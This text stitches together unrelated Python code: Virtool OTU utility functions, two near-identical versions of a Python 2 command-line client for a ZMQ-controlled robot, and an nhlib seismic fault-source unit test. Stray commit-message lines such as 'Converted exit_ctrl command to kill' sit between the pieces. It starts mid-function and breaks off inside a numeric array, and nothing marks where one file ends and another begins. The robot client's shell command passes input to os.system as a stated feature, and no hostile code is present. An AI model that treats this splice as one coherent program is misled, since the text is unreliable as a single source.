sequence_ids += [sequence["_id"] for sequence in isolate["sequences"]]
return sequence_ids
def find_isolate(isolates, isolate_id):
"""
Return the isolate identified by ``isolate_id`` from a list of isolates.
:param isolates: a list of isolate dicts
:type isolates: list
:param isolate_id: the isolate_id of the isolate to return
:type isolate_id: str
:return: an isolate
:rtype: dict
"""
return next((isolate for isolate in isolates if isolate["id"] == isolate_id), None)
def format_otu(joined, issues=False, most_recent_change=None):
"""
Join the otu identified by the passed ``otu_id`` or use the ``joined`` otu document if available. Then,
format the joined otu into a format that can be directly returned to API clients.
:param joined:
:type joined: Union[dict, NoneType]
:param issues: an object describing issues in the otu
:type issues: Union[dict, NoneType, bool]
:param most_recent_change: a change document for the most recent change made to OTU
:type most_recent_change: dict
:return: a joined and formatted otu
:rtype: dict
"""
formatted = virtool.utils.base_processor(joined)
del formatted["lower_name"]
for isolate in formatted["isolates"]:
for sequence in isolate["sequences"]:
del sequence["otu_id"]
del sequence["isolate_id"]
sequence["id"] = sequence.pop("_id")
formatted["most_recent_change"] = None
if most_recent_change:
formatted["most_recent_change"] = virtool.utils.base_processor(most_recent_change)
if issues is False:
issues = verify(joined)
formatted["issues"] = issues
return formatted
def format_isolate_name(isolate):
"""
Take a complete or partial isolate ``dict`` and return a readable isolate name.
:param isolate: a complete or partial isolate ``dict`` containing ``source_type`` and ``source_name`` fields.
:type isolate: dict
:return: an isolate name
:rtype: str
"""
if not isolate["source_type"] or not isolate["source_name"]:
return "Unnamed Isolate"
return " ".join((isolate["source_type"].capitalize(), isolate["source_name"]))
def merge_otu(otu, sequences):
"""
Merge the given sequences in the given otu document. The otu will gain a ``sequences`` field containing a
list of its associated sequence documents.
:param otu: a otu document.
:type otu: dict
:param sequences: the sequence documents to merge into the otu.
:type sequences: list
:return: the merged otu.
:rtype: dict
"""
merged = deepcopy(otu)
for isolate in merged["isolates"]:
isolate_id = isolate["id"]
isolate["sequences"] = [s for s in sequences if s["isolate_id"] == isolate_id]
return merged
def split(merged):
"""
Split a merged otu document into a list of sequence documents associated with the otu and a regular otu
document containing no sequence sub-documents.
:param merged: the merged otu to split
:type merged: dict
:return: a tuple containing the new otu document and a list of sequence documents
:type: tuple
"""
sequences = list()
otu = deepcopy(merged)
for isolate in otu["isolates"]:
sequences += isolate.pop("sequences")
return otu, sequences
def verify(joined):
"""
Checks that the passed otu and sequences constitute valid Virtool records and can be included in a otu
index. Error fields are:
* emtpy_otu - otu has no isolates associated with it.
* empty_isolate - isolates that have no sequences associated with them.
* empty_sequence - sequences that have a zero length sequence field.
* isolate_inconsistency - otu has isolates containing different numbers of sequences.
:param joined: a joined otu
:type joined: dict
:return: return any errors or False if there are no errors.
:rtype: Union[dict, None]
"""
errors = {
"empty_otu": len(joined["isolates"]) == 0,
"empty_isolate": list(),
"empty_sequence": list(),
"isolate_inconsistency": False
}
isolate_sequence_counts = list()
# Append the isolate_ids of any isolates without sequences to empty_isolate. Append the isolate_id and sequence
# id of any sequences that have an empty sequence.
for isolate in joined["isolates"]:
isolate_sequences = isolate["sequences"]
isolate_sequence_count = len(isolate_sequences)
# If there are no sequences attached to the isolate it gets an empty_isolate error.
if isolate_sequence_count == 0:
errors["empty_isolate"].append(isolate["id"])
isolate_sequence_counts.append(isolate_sequence_count)
errors["empty_sequence"] += filter(lambda sequence: len(sequence["sequence"]) == 0, isolate_sequences)
# Give an isolate_inconsistency error the number of sequences is not the same for every isolate. Only give the
# error if the otu is not also emtpy (empty_otu error).
errors["isolate_inconsistency"] = (
len(set(isolate_sequence_counts)) != 1 and not
(errors["empty_otu"] or errors["empty_isolate"])
)
# If there is an error in the otu, return the errors object. Otherwise return False.
has_errors = False
for key, value in errors.items():
if value:
has_errors = True
else:
errors[key] = False
if has_errors:
return errors
return None
|
Correct test url that was raising connection err
|
#!/usr/bin/env python
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
# These paths will need to be changed if this is running ouside of the repo
new_path = [os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")]
sys.path = new_path + sys.path
import client.ctrl_client as ctrl_client_mod
import client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
"""CLI for interacting with the bot.
Note that the architecture is that interfaces, like the Command
Line *Interface*, are used by agents like humans to interact
with the bot. For interfaces to communicate with the bot, they
own clients (like CtrlClient and SubClient), which know how to
speak ZMQ to the servers (like CtrlServer and PubServer) running on
the bot. Servers own systems (like gunner and driver) and known how
to fire commands off to those systems and/or share data about their
state.
"""
prompt = "bot$ "
def __init__(self, ctrl_addr, sub_addr):
"""Build CtrlClient and SubClient, for connections to servers.
We're not using a logger or config here to reduce dependencies.
CtrlClient is used for sending commands to the bot. Some commands,
like `ping`, are answered by CtrlClient directly. Others, like
`fire`, are actually exported methods that CtrlClient exposes
via the API. Those calls are passed to the relevant method of a
system owned by CtrlClient.
SubClient manages subscriptions to topics published by PubServer
on the bot. Topics can be subscribed to via `sub_add` and removed
via `sub_del`. To print the data being published, use `sub`.
Only topics that are actually subscribed to by one or more clients
will be published by PubServer, saving bot resources. Note that
PubServer isn't spawned by default when CtrlServer is created.
To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
:param ctrl_addr: Address of control server to connect to via ZMQ.
:type ctrl_addr: string
:param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
:type sub_addr: string
"""
# Call superclass __init__
cmd.Cmd.__init__(self)
# Build control client
try:
self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
except Exception, e:
print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
sys.exit(-1)
# Build sub client
try:
self.sub_client = sub_client_mod.SubClient(sub_addr)
except Exception, e:
print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
sys.exit(-1)
def default(self, raw_args):
"""Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
API commands are those given by the `list` command. Note that a
heuristic is used to convert params (like "7" in the example above)
into the types expected by the method that will be called and passed
that param by CtrlServer. It has held up well so far.
:param raw_args: Command from user to be parsed/passed to CtrlServer.
:type raw_args: string
"""
obj_name, _, rest = raw_args.partition(" ")
if obj_name in self.ctrl_client.objects:
method_name, _, params = rest.partition(" ")
if method_name in self.ctrl_client.objects[obj_name]:
try:
param_dict = {}
# Split param into its key:value strs and iterate on them
for param in params.split():
# Split key:value param pair
key, value = param.split(":")
# We need to convert param's value, which was given to
# this method as a string in raw_args, to the type
# expected by the method it will be passed to.
# This is a dirty heuristic (that so far works well)!
# Try converting to int/float - easy to know if wrong
try:
if "." in value:
value = float(value)
else:
value = int(value)
except ValueError:
# It wasn't an int or float, assume string
# If user gave key:'value', strip '' chars
if value.startswith("'") and value.endswith("'"):
value = value[1:-1]
# It's already type string, no need to cast
param_dict[key] = value
except IndexError:
print "Bad parameter list"
return
except ValueError:
print "Bad parameter value"
return
result = self.ctrl_client.call(obj_name, method_name, param_dict)
print "-->", result
else:
print "Unknown API method:", method_name
else:
print "Unknown command:", obj_name
def completenames(self, text, *ignored):
"""Handles tab-completion of object names exported by the API.
Object names, like those returned by `list` (driver, gun...),
aren't known to Cmd.completenames. We extend it here to deal
with tab-completing them.
:param text: Text the user has type so far, to be tab-completed.
:type text: string
:param *ignored: Not documented in Cmd.completenames. No idea.
:type *ignored: Not documented in Cmd.completenames. Dict?
"""
# NB: We can't use super() here since Cmd is an old-style class
# Gets list of do_* methods that match what the user has typed so far
cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
# Need to do the same thing for exported API methods
# Names of objects exported by API (like driver, gunner...)
obj_names = self.ctrl_client.objects.keys()
# Build list of obj_names that start with text given by user
api_match_names = [x for x in obj_names if x.startswith(text)]
return cmd_match_names + api_match_names
def completedefault(self, text, line, begidx, endidx):
"""Handles tab-completion of method names exported by API.
The matching of the first term (the object name exported by the API)
is done separately, using the results of copmletenames().
:param text: Part of method name (second arg) typed so far by user.
:type text: string
:param line: Entire line typed so far by user.
:type line: string
:param begidx: Index into "line" where "text" begins.
:type begidx: int
:param endidx: Index into "line" where "text" ends.
:type endidx: int
:returns: List of exported API methods that match text given by user.
"""
obj, _, rest = line.partition(" ")
if obj in self.ctrl_client.objects:
# If the user tries to tab-complete once they have typed
# `obj method par..`, "par.." being the start of a param, this
# line will grab the method name only, dropping the param. We
# can't tab-complete params at the moment (but that would be nice).
method, _, params = rest.strip().partition(" ")
# Only does this if user is tab-completing method, not params
if method == text: # FIXME: Should actually verify index position
method_names = self.ctrl_client.objects[obj]
match_names = [x for x in method_names if x.startswith(text)]
return match_names
def do_list(self, raw_args):
"""Provide a list of bot API objects and their methods.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print
print "Available bot objects and methods"
print
for obj_name, methods in sorted(self.ctrl_client.objects.items()):
print "{}:".format(obj_name)
for method in methods:
print " - {}".format(method)
print
def help_list(self):
"""Provide help message for list command."""
print "list"
print "\tList on-bot objects and methods exposed by the API."
def do_ping(self, raw_args):
"""Ping the control server on the bot.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
reply_time = self.ctrl_client.ping()
print "CtrlServer response time: {}ms".format(reply_time)
def help_ping(self):
"""Provide help message for ping command."""
print "ping"
print "\tPing the control server on the bot."
def do_sub_add(self, raw_args):
"""Subscribe to a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to add.
:type raw_args: string
"""
# Get and validate arguments
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.add_topic(topic)
def help_sub_add(self):
"""Provide help message for sub_add command."""
print "sub_add <topic>"
print "\tSubscribe to a published topic."
def do_sub_del(self, raw_args):
"""Unsubscribe from a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to unsubscribe from.
:type raw_args: string
"""
# Get and validate arguments
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.del_topic(topic)
def help_sub_del(self):
"""Provide help message for sub_del command."""
print "sub_del <topic>"
print "\tUnsubscribe from a published topic."
def do_sub(self, raw_args):
"""Print topics subscribed to via SubClient.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.sub_client.print_msgs()
def help_sub(self):
"""Provide help message for sub command."""
print "sub"
print "\tPrint messages subscribed to. Ctrl+c to exit."
def do_exit_ctrl(self, raw_args):
"""Send message to CtrlServer, asking it to exit.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.ctrl_client.exit_server()
def help_exit_ctrl(self):
"""Provide help message for exit_ctrl command."""
print "exit_ctrl"
print "\tAsk the CtrlServer to exit."
def do_die(self, raw_args):
"""Disconnect from servers and close CLI.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_die(self):
"""Provide help message for die command."""
print "die"
print "\tDisconnect from servers and close CLI."
def do_shell(self, cmd):
"""Allows normal shell commands to be run.
:param cmd: Everything after "shell" or "!", to be passed to shell.
:type cmd: string
"""
os.system(cmd)
def help_shell(self):
"""Provide help message for shell command."""
print "!|shell [command]"
print "\tSend command to underlying system shell (like Bash)."
def do_EOF(self, raw_args):
"""Cleans up when ctrl+d is used to exit client.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_EOF(self):
"""Provide help message for EOF (ctrl+d) command."""
print "ctrl+d"
print "\tDisconnect from servers and close CLI with ctrl+d."
def help_help(self):
"""Provide help message for help command."""
print "help [command]"
print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
if len(sys.argv) == 1:
print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
elif len(sys.argv) == 3:
# Using given ctr_addr and sub_addr
ctrl_addr = sys.argv[1]
sub_addr = sys.argv[2]
CLI(ctrl_addr, sub_addr).cmdloop()
else:
print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
Converted exit_ctrl command to kill
#!/usr/bin/env python
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
# These paths will need to be changed if this is running ouside of the repo
new_path = [os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")]
sys.path = new_path + sys.path
import client.ctrl_client as ctrl_client_mod
import client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
"""CLI for interacting with the bot.
Note that the architecture is that interfaces, like the Command
Line *Interface*, are used by agents like humans to interact
with the bot. For interfaces to communicate with the bot, they
own clients (like CtrlClient and SubClient), which know how to
speak ZMQ to the servers (like CtrlServer and PubServer) running on
the bot. Servers own systems (like gunner and driver) and known how
to fire commands off to those systems and/or share data about their
state.
"""
prompt = "bot$ "
def __init__(self, ctrl_addr, sub_addr):
"""Build CtrlClient and SubClient, for connections to servers.
We're not using a logger or config here to reduce dependencies.
CtrlClient is used for sending commands to the bot. Some commands,
like `ping`, are answered by CtrlClient directly. Others, like
`fire`, are actually exported methods that CtrlClient exposes
via the API. Those calls are passed to the relevant method of a
system owned by CtrlClient.
SubClient manages subscriptions to topics published by PubServer
on the bot. Topics can be subscribed to via `sub_add` and removed
via `sub_del`. To print the data being published, use `sub`.
Only topics that are actually subscribed to by one or more clients
will be published by PubServer, saving bot resources. Note that
PubServer isn't spawned by default when CtrlServer is created.
To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
:param ctrl_addr: Address of control server to connect to via ZMQ.
:type ctrl_addr: string
:param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
:type sub_addr: string
"""
# Call superclass __init__
cmd.Cmd.__init__(self)
# Build control client
try:
self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
except Exception, e:
print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
sys.exit(-1)
# Build sub client
try:
self.sub_client = sub_client_mod.SubClient(sub_addr)
except Exception, e:
print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
sys.exit(-1)
def default(self, raw_args):
"""Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
API commands are those given by the `list` command. Note that a
heuristic is used to convert params (like "7" in the example above)
into the types expected by the method that will be called and passed
that param by CtrlServer. It has held up well so far.
:param raw_args: Command from user to be parsed/passed to CtrlServer.
:type raw_args: string
"""
obj_name, _, rest = raw_args.partition(" ")
if obj_name in self.ctrl_client.objects:
method_name, _, params = rest.partition(" ")
if method_name in self.ctrl_client.objects[obj_name]:
try:
param_dict = {}
# Split param into its key:value strs and iterate on them
for param in params.split():
# Split key:value param pair
key, value = param.split(":")
# We need to convert param's value, which was given to
# this method as a string in raw_args, to the type
# expected by the method it will be passed to.
# This is a dirty heuristic (that so far works well)!
# Try converting to int/float - easy to know if wrong
try:
if "." in value:
value = float(value)
else:
value = int(value)
except ValueError:
# It wasn't an int or float, assume string
# If user gave key:'value', strip '' chars
if value.startswith("'") and value.endswith("'"):
value = value[1:-1]
# It's already type string, no need to cast
param_dict[key] = value
except IndexError:
print "Bad parameter list"
return
except ValueError:
print "Bad parameter value"
return
result = self.ctrl_client.call(obj_name, method_name, param_dict)
print "-->", result
else:
print "Unknown API method:", method_name
else:
print "Unknown command:", obj_name
def completenames(self, text, *ignored):
"""Handles tab-completion of object names exported by the API.
Object names, like those returned by `list` (driver, gun...),
aren't known to Cmd.completenames. We extend it here to deal
with tab-completing them.
:param text: Text the user has type so far, to be tab-completed.
:type text: string
:param *ignored: Not documented in Cmd.completenames. No idea.
:type *ignored: Not documented in Cmd.completenames. Dict?
"""
# NB: We can't use super() here since Cmd is an old-style class
# Gets list of do_* methods that match what the user has typed so far
cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
# Need to do the same thing for exported API methods
# Names of objects exported by API (like driver, gunner...)
obj_names = self.ctrl_client.objects.keys()
# Build list of obj_names that start with text given by user
api_match_names = [x for x in obj_names if x.startswith(text)]
return cmd_match_names + api_match_names
def completedefault(self, text, line, begidx, endidx):
"""Handles tab-completion of method names exported by API.
The matching of the first term (the object name exported by the API)
is done separately, using the results of copmletenames().
:param text: Part of method name (second arg) typed so far by user.
:type text: string
:param line: Entire line typed so far by user.
:type line: string
:param begidx: Index into "line" where "text" begins.
:type begidx: int
:param endidx: Index into "line" where "text" ends.
:type endidx: int
:returns: List of exported API methods that match text given by user.
"""
obj, _, rest = line.partition(" ")
if obj in self.ctrl_client.objects:
# If the user tries to tab-complete once they have typed
# `obj method par..`, "par.." being the start of a param, this
# line will grab the method name only, dropping the param. We
# can't tab-complete params at the moment (but that would be nice).
method, _, params = rest.strip().partition(" ")
# Only does this if user is tab-completing method, not params
if method == text: # FIXME: Should actually verify index position
method_names = self.ctrl_client.objects[obj]
match_names = [x for x in method_names if x.startswith(text)]
return match_names
def do_list(self, raw_args):
"""Provide a list of bot API objects and their methods.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print
print "Available bot objects and methods"
print
for obj_name, methods in sorted(self.ctrl_client.objects.items()):
print "{}:".format(obj_name)
for method in methods:
print " - {}".format(method)
print
def help_list(self):
"""Provide help message for list command."""
print "list"
print "\tList on-bot objects and methods exposed by the API."
def do_ping(self, raw_args):
"""Ping the control server on the bot.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
reply_time = self.ctrl_client.ping()
print "CtrlServer response time: {}ms".format(reply_time)
def help_ping(self):
"""Provide help message for ping command."""
print "ping"
print "\tPing the control server on the bot."
def do_sub_add(self, raw_args):
"""Subscribe to a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to add.
:type raw_args: string
"""
# Get and validate arguments
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.add_topic(topic)
def help_sub_add(self):
"""Provide help message for sub_add command."""
print "sub_add <topic>"
print "\tSubscribe to a published topic."
def do_sub_del(self, raw_args):
"""Unsubscribe from a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to unsubscribe from.
:type raw_args: string
"""
# Get and validate arguments
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.del_topic(topic)
def help_sub_del(self):
"""Provide help message for sub_del command."""
print "sub_del <topic>"
print "\tUnsubscribe from a published topic."
def do_sub(self, raw_args):
"""Print topics subscribed to via SubClient.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.sub_client.print_msgs()
def help_sub(self):
"""Provide help message for sub command."""
print "sub"
print "\tPrint messages subscribed to. Ctrl+c to exit."
def do_kill(self, raw_args):
"""Send message to CtrlServer, asking it to exit.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.ctrl_client.exit_server()
def help_kill(self):
"""Provide help message for kill command."""
print "kill"
print "\tAsk the CtrlServer to exit."
def do_die(self, raw_args):
"""Disconnect from servers and close CLI.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_die(self):
"""Provide help message for die command."""
print "die"
print "\tDisconnect from servers and close CLI."
def do_shell(self, cmd):
"""Allows normal shell commands to be run.
:param cmd: Everything after "shell" or "!", to be passed to shell.
:type cmd: string
"""
os.system(cmd)
def help_shell(self):
"""Provide help message for shell command."""
print "!|shell [command]"
print "\tSend command to underlying system shell (like Bash)."
def do_EOF(self, raw_args):
"""Cleans up when ctrl+d is used to exit client.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_EOF(self):
"""Provide help message for EOF (ctrl+d) command."""
print "ctrl+d"
print "\tDisconnect from servers and close CLI with ctrl+d."
def help_help(self):
"""Provide help message for help command."""
print "help [command]"
print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
if len(sys.argv) == 1:
print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
elif len(sys.argv) == 3:
# Using given ctr_addr and sub_addr
ctrl_addr = sys.argv[1]
sub_addr = sys.argv[2]
CLI(ctrl_addr, sub_addr).cmdloop()
else:
print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
|
# nhlib: A New Hazard Library
# Copyright (C) 2012 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from nhlib.const import TRT
from nhlib.source.simple_fault import SimpleFaultSource
from nhlib.source.rupture import ProbabilisticRupture
from nhlib.mfd import TruncatedGRMFD
from nhlib.scalerel.peer import PeerMSR
from nhlib.geo import Point, Line, Polygon
from nhlib.tom import PoissonTOM
from tests import assert_angles_equal
from tests.geo.surface._utils import assert_mesh_is
from tests.source import _simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
TRT = TRT.ACTIVE_SHALLOW_CRUST
RAKE = 0
def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
source_id = name = 'test-source'
trt = self.TRT
rake = self.RAKE
rupture_mesh_spacing = 1
upper_seismogenic_depth = 0
lower_seismogenic_depth = 4.2426406871192848
magnitude_scaling_relationship = PeerMSR()
rupture_aspect_ratio = aspect_ratio
if fault_trace is None:
fault_trace = Line([Point(0.0, 0.0),
Point(0.0, 0.0359728811758),
Point(0.0190775080917, 0.0550503815181),
Point(0.03974514139, 0.0723925718855)])
return SimpleFaultSource(
source_id, name, trt, mfd, rupture_mesh_spacing,
magnitude_scaling_relationship, rupture_aspect_ratio,
upper_seismogenic_depth, lower_seismogenic_depth,
fault_trace, dip, rake
)
def _test_ruptures(self, expected_ruptures, source):
tom = PoissonTOM(time_span=50)
ruptures = list(source.iter_ruptures(tom))
for rupture in ruptures:
self.assertIsInstance(rupture, ProbabilisticRupture)
self.assertIs(rupture.temporal_occurrence_model, tom)
self.assertIs(rupture.tectonic_region_type, self.TRT)
self.assertEqual(rupture.rake, self.RAKE)
self.assertEqual(len(expected_ruptures), len(ruptures))
for i in xrange(len(expected_ruptures)):
expected_rupture, rupture = expected_ruptures[i], ruptures[i]
self.assertAlmostEqual(rupture.mag, expected_rupture['mag'])
self.assertAlmostEqual(rupture.rake, expected_rupture['rake'])
self.assertAlmostEqual(rupture.occurrence_rate,
expected_rupture['occurrence_rate'])
assert_mesh_is(self, rupture.surface,
expected_rupture['surface'])
self.assertEqual(rupture.hypocenter,
Point(*expected_rupture['hypocenter']))
assert_angles_equal(self, rupture.surface.get_strike(),
expected_rupture['strike'], delta=0.5)
assert_angles_equal(self, rupture.surface.get_dip(),
expected_rupture['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
def test_2(self):
# rupture dimensions are larger then mesh_spacing, number of nodes
# along strike and dip is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=3.0, max_mag=4.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST2_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
def test_3(self):
# rupture length greater than fault length, number of nodes along
# length is odd and along width is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.0, max_mag=6.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST3_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=4.0))
def test_4(self):
# rupture width greater than fault width, number of nodes along
# length is even, along width is odd
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.4, max_mag=5.5,
bin_width=0.1)
self._test_ruptures(test_data.TEST4_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=0.5))
def test_5(self):
# rupture length and width greater than fault length and width
# respectively
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=6.0, max_mag=7.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST5_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
def test_mesh_spacing_too_small(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
bin_width=1.0)
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1.0)
self.assertEqual(str(ar.exception),
'mesh spacing 1 is too low to represent '
'ruptures of magnitude 1.5')
def test_fault_trace_intersects_itself(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
fault_trace = Line([Point(0, 0), Point(0, 1),
Point(1, 1), Point(0, 0.5)])
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=fault_trace)
self.assertEqual(str(ar.exception), 'fault trace intersects itself')
class SimpleFaultRupEncPolyTestCase(_BaseFaultSourceTestCase):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
def test_dip_90_no_dilation(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon()
elons = [0, 0, 0.04]
elats = [0, 0.04, 0.06]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats)
def test_dip_90_dilated(self):
trace = Line([Point(-1.0, 2.0), Point(-1.0, 2.04)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon(dilation=4.5)
elons = [
-1.0405401, -1.0403452, -1.0397622, -1.0387967, -1.0374580,
-1.0357589, -1.0337159, -1.0313487, -1.0286799, -1.0286349,
-1.0256903, -1.0224984, -1.0190897, -1.0154972, -1.0117554,
-1.0079004, -1.0039693, -1.0000000, -0.9960307, -0.9920996,
-0.9882446, -0.9845028, -0.9809103, -0.9775016, -0.9743097,
-0.9713651, -0.9713201, -0.9686513, -0.9662841, -0.9642411,
-0.9625420, -0.9612033, -0.9602378, -0.9596548, -0.9594599,
-0.9594609, -0.9596560, -0.9602391, -0.9612048, -0.9625436,
-0.9642428, -0.9662858, -0.9686531, -0.9713218, -0.9713668,
-0.9743113, -0.9775031, -0.9809116, -0.9845039, -0.9882454,
-0.9921002, -0.9960310, -1.0000000, -1.0039690, -1.0078998,
-1.0117546, -1.0154961, -1.0190884, -1.0224969, -1.0256887,
-1.0286332, -1.0286782, -1.0313469, -1.0337142, -1.0357572,
-1.0374564, -1.0387952, -1.0397609, -1.0403440, -1.0405391
]
elats = [
2.0399995, 2.0439662, 2.0478947, 2.0517472, 2.0554866, 2.0590768,
2.0624833, 2.0656733, 2.0686160, 2.0686610, 2.0713281, 2.0736940,
2.0757358, 2.0774338, 2.0787718, 2.0797368, 2.0803196, 2.0805144,
2.0803196, 2.0797368, 2.0787718, 2.0774338, 2.0757358, 2.0736940,
2.0713281, 2.0686610, 2.0686160, 2.0656733, 2.0624833, 2.0590768,
2.0554866, 2.0517472, 2.0478947, 2.0439662, 2.0399995, 1.9999995,
1.9960328, 1.9921043, 1.9882519, 1.9845126, 1.9809224, 1.9775160,
1.9743261, 1.9713835, 1.9713385, 1.9686715, 1.9663057, 1.9642640,
1.9625660, 1.9612281, 1.9602631, 1.9596804, 1.9594856, 1.9596804,
1.9602631, 1.9612281, 1.9625660, 1.9642640, 1.9663057, 1.9686715,
1.9713385, 1.9713835, 1.9743261, 1.9775160, 1.9809224, 1.9845126,
1.9882519, 1.9921043, 1.9960328, 1.9999999
]
numpy.testing.assert_allclose(polygon.lons, elons)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-6)
def test_dip_30_no_dilation(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon()
elons = [0.0549872, 0., 0., 0.04, 0.09498719]
elats = [-0.0366581, 0, 0.04, 0.06, 0.02334187]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
def test_dip_30_dilated(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon(dilation=10)
elons = [
0.1298154, 0.1245655, 0.1186454, 0.1121124, 0.1050291,
0.0974640, 0.0894897, 0.0811832, 0.0726244, 0.0638958,
0.0550813, 0.0462659, 0.0375346, 0.0289713, 0.0206585,
0.0126764, 0.0051017, -0.0498855, -0.0569870, -0.0635385,
-0.0694768, -0.0747446, -0.0792910, -0.0830722, -0.0860516,
